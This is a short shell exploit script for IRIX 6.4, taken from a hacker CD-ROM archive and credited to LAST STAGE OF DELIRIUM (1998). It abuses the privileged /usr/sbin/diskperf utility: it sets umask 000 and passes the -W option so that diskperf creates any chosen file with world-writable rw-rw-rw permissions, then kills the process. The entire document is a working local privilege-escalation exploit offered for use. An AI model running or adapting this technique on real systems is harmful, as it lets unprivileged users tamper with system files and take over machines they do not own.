home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / irix / irx_diskperf.txt < prev    next >
Encoding:
Text File  |  2002-10-22  |  604 b   |  26 lines

  1. #!/bin/sh
  2. ## copyright LAST STAGE OF DELIRIUM may 1998 poland            *://lsd-pl.net/ #
  3. ## /usr/sbin/diskperf                                                          #
  4.  
  5. #  creates files and set rw-rw-rw permissions                                  #
  6.  
  7. echo "copyright LAST STAGE OF DELIRIUM may 1998 poland  //lsd-pl.net/"
  8. echo "/usr/sbin/diskperf for irix 6.4 IP:all\n"
  9.  
  10. EXECUTABLE=/usr/sbin/diskperf
  11.  
  12. if [ $# != 1 ]
  13.     then
  14.     echo "usage: "$0" file"
  15.     exit 1
  16. fi
  17. FILE=$1
  18.  
  19. umask 000
  20. $EXECUTABLE -t 1 -c 1k -r1k -m1k -W $FILE > /dev/null &
  21. sleep 5
  22. killall -9 diskperf 
  23.  
  24.  
  25.  
  26.